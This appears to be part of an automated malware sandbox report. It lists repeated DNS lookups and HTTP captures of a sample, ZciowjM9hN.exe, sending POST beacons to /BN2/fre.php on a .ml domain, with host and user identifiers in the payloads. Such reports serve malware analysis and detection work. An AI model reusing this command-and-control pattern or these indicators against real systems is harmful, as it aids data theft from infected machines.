Jun 9, 2022 12:19:30.757725954 CEST	8.8.8.8	192.168.2.3	0x5289	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:36.243210077 CEST	8.8.8.8	192.168.2.3	0xa975	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:36.243210077 CEST	8.8.8.8	192.168.2.3	0xa975	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:38.981350899 CEST	8.8.8.8	192.168.2.3	0xc035	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:38.981350899 CEST	8.8.8.8	192.168.2.3	0xc035	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:42.580615997 CEST	8.8.8.8	192.168.2.3	0xd816	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:42.580615997 CEST	8.8.8.8	192.168.2.3	0xd816	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:44.334171057 CEST	8.8.8.8	192.168.2.3	0x25ec	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:44.334171057 CEST	8.8.8.8	192.168.2.3	0x25ec	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:45.835082054 CEST	8.8.8.8	192.168.2.3	0x2e8b	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.6	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:45.835082054 CEST	8.8.8.8	192.168.2.3	0x2e8b	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.6	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:50.486875057 CEST	8.8.8.8	192.168.2.3	0x8aeb	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:50.486875057 CEST	8.8.8.8	192.168.2.3	0x8aeb	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:52.699559927 CEST	8.8.8.8	192.168.2.3	0x223e	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:52.699559927 CEST	8.8.8.8	192.168.2.3	0x223e	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:54.832241058 CEST	8.8.8.8	192.168.2.3	0xcec8	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:54.832241058 CEST	8.8.8.8	192.168.2.3	0xcec8	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:56.576721907 CEST	8.8.8.8	192.168.2.3	0x2bf0	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:56.576721907 CEST	8.8.8.8	192.168.2.3	0x2bf0	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:57.980577946 CEST	8.8.8.8	192.168.2.3	0x5e55	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:57.980577946 CEST	8.8.8.8	192.168.2.3	0x5e55	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:59.334050894 CEST	8.8.8.8	192.168.2.3	0xe373	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:19:59.334050894 CEST	8.8.8.8	192.168.2.3	0xe373	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:00.753479958 CEST	8.8.8.8	192.168.2.3	0x4d36	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:00.753479958 CEST	8.8.8.8	192.168.2.3	0x4d36	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:02.319335938 CEST	8.8.8.8	192.168.2.3	0x20cd	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.6	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:02.319335938 CEST	8.8.8.8	192.168.2.3	0x20cd	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.6	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:04.028419971 CEST	8.8.8.8	192.168.2.3	0xa367	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:04.028419971 CEST	8.8.8.8	192.168.2.3	0xa367	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:05.442060947 CEST	8.8.8.8	192.168.2.3	0x4af5	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:05.442060947 CEST	8.8.8.8	192.168.2.3	0x4af5	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:07.436849117 CEST	8.8.8.8	192.168.2.3	0xc229	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:07.436849117 CEST	8.8.8.8	192.168.2.3	0xc229	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:10.576389074 CEST	8.8.8.8	192.168.2.3	0xbe0	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:10.576389074 CEST	8.8.8.8	192.168.2.3	0xbe0	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:13.294228077 CEST	8.8.8.8	192.168.2.3	0x96e4	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:13.294228077 CEST	8.8.8.8	192.168.2.3	0x96e4	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:16.227924109 CEST	8.8.8.8	192.168.2.3	0x3b2f	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:16.227924109 CEST	8.8.8.8	192.168.2.3	0x3b2f	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:18.170475960 CEST	8.8.8.8	192.168.2.3	0x9deb	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:18.170475960 CEST	8.8.8.8	192.168.2.3	0x9deb	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:19.444677114 CEST	8.8.8.8	192.168.2.3	0x63e	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:19.444677114 CEST	8.8.8.8	192.168.2.3	0x63e	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:20.845380068 CEST	8.8.8.8	192.168.2.3	0xc81a	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.6	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:20.845380068 CEST	8.8.8.8	192.168.2.3	0xc81a	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.6	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:22.631125927 CEST	8.8.8.8	192.168.2.3	0xd04d	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.6	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:22.631125927 CEST	8.8.8.8	192.168.2.3	0xd04d	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.6	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:23.955482960 CEST	8.8.8.8	192.168.2.3	0x5a2e	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:23.955482960 CEST	8.8.8.8	192.168.2.3	0x5a2e	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:25.184815884 CEST	8.8.8.8	192.168.2.3	0xbeb6	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:25.184815884 CEST	8.8.8.8	192.168.2.3	0xbeb6	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:27.354715109 CEST	8.8.8.8	192.168.2.3	0x751b	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:27.354715109 CEST	8.8.8.8	192.168.2.3	0x751b	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:29.305778027 CEST	8.8.8.8	192.168.2.3	0xd85e	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.96.7	A (IP address)	IN (0x0001)
Jun 9, 2022 12:20:29.305778027 CEST	8.8.8.8	192.168.2.3	0xd85e	No error (0)	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml	188.114.97.7	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

vmopahtqdf84hfvsqepalcbcch63gdyvah.ml

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49745	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:18:46.752224922 CEST	1142	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 190 Connection: close
Jun 9, 2022 12:18:46.769325018 CEST	1143	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: 'ckav.ruhardz472847DESKTOP-716T771k08F9C4E9C79A3B52B3F739430z2HiH
Jun 9, 2022 12:18:46.913125038 CEST	1143	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:18:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Bs2DoCx7o%2FFhS1TXQUi653vAatRTnco%2Bj1Xph31RuXJYFAAI7tRqGUe%2BJvJjK7%2FvGaCpbNqLq4uztQHgVCTrBZmvpAWvpqADiToFAAg2vURNJ6772rufR8bH7qGlxa1666jecxeRCiH8pLWXLf4V772ffth9koYA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7189200a3b9f9162-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49748	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:18:50.155869961 CEST	1144	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 190 Connection: close
Jun 9, 2022 12:18:50.173213959 CEST	1145	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: 'ckav.ruhardz472847DESKTOP-716T771+08F9C4E9C79A3B52B3F739430qlUSm
Jun 9, 2022 12:18:50.320050955 CEST	1145	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:18:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lCsfECh6JgcYZ7pIJr2eQu5siZtpRaj%2BvJmGRAlXh7NnnCmky4z0%2Ftbq7gmi2nJQ21olKqCXvnYoQaMxW8zi9v9v%2BPsvB5a5a6mF71tq7NGDEIxSYGdLK%2B7e3sgOAmGaNOfAee88Et4Mo1kCgfdVrSo5Es9uBG2w"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7189201f7cbd9bf8-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.3	49769	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:19:11.569139957 CEST	1331	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:19:11.588557005 CEST	1331	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:19:11.716733932 CEST	1332	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:19:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cc32CSL9j%2BNDaVuhe%2FA%2FpImQ7S5ssEDJpqhUz9Np%2B3%2BF6Lpul2j95BgWQj4kZG8cNVBKs0m8fXc8hM%2B3IXUKEw%2Bk9blQPLBERU9FXvJ%2FShw1sHaZv%2FlIYzlC54Bqq%2BqyOQs2gQt5S9%2BPJRF1%2FljbhSDz48%2FoNbsC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 718920a55f939b22-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.3	49770	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:19:14.041673899 CEST	1333	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:19:14.058743954 CEST	1333	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:19:14.153940916 CEST	1334	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:19:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=T0r8J8bS8Y9eqjksMbledDuOBM1HvyuR6q1WzJM4%2F%2BKvcn1jEbnobd5ciYxowswoZAiovpz%2Fy%2BJjdH2JILT5Fv5FP4OQ1RvPSdvM%2FE%2BfaoLFyrrdCiu7TeerrqOm9qAjcZP0uLHaPoAPu9ODm%2BhccWdisxFE1aBH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 718920b4cf479bb9-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.3	49771	188.114.97.6	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:19:17.236324072 CEST	1335	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:19:17.253592014 CEST	1335	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:19:17.360335112 CEST	1336	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:19:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jKiQzg8eS1ae0ORIsvF4gHGO7m9qdmttXEzEmsz%2B%2FoEu1AUjsN3IadETfo64ifr4E%2BZwFGwUfhVU7GbVK7wUaMyEvw2n2D%2FGUq6BATBG%2FHBTgpa%2B6J8FUVywQYYqKEZY5zZ%2FJVFpMECXpSudXGcN84bXQShVQf8Y"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 718920c8c88e9b2e-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.3	49772	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:19:18.470176935 CEST	1336	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:19:18.487781048 CEST	1337	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:19:18.584544897 CEST	1337	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:19:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZwckYkvSFT0pt0b04qtzhI1kMsG5qlNQy89EepY08iSSCW2dvGAtyLRjwEmD6oV7hiW53LUMjwl9QTcRdP6WCH%2FNlQnhAmMP57lcIqGF7dwLuo46azR27ks1D85iAl9DDgfEwWXwvY11zN3U7hLL4M1H89um43qN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 718920d08ade914c-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.3	49773	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:19:20.082461119 CEST	1338	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:19:20.101741076 CEST	1339	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:19:20.237472057 CEST	1339	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:19:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DEHOfdOGNBr1U%2FKot4EZ%2BWPBNHC2PoT4hjwi5xTDvx1z6AuwHFw5xxvruyXvscKKtXcC2Be4qzdKMDyQb8wzynXBkx3LQOzIZC6P7VjYMpvAlt6GrJzgibr2TLrXaG11I9325RgvIFdrTDvqPTVJrC1jxXoVWfrj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 718920da8d809019-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.3	49774	188.114.96.7	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:19:21.474098921 CEST	1340	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:19:21.490986109 CEST	1341	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 9, 2022 12:19:21.592752934 CEST	1341	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jun 2022 10:19:21 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8TKHGx1Jd20MEpkn1Gcmh1jINo4%2F5yZyAvoLhYqejTmZAMvoZXsPcNufHbn%2F4pZYDqH8RrMoRSSh9ru6C899e%2B1EJ4eDOY8UZUMuz2yJNrktGL7Nwqc6bC0O6hlQ2UKIzb%2FmaUAI2qlmBBgduzYAGtzZffIcEKeN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 718920e33c599131-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.3	49775	188.114.97.6	80	C:\Users\user\Desktop\ZciowjM9hN.exe

Timestamp	kBytes transferred	Direction	Data
Jun 9, 2022 12:19:22.604146004 CEST	1342	OUT	POST /BN2/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.ml Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E576ACE Content-Length: 163 Connection: close
Jun 9, 2022 12:19:22.621094942 CEST	1343	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz472847DESKTOP-716T77108F9C4E9C79A3B52B3F739430
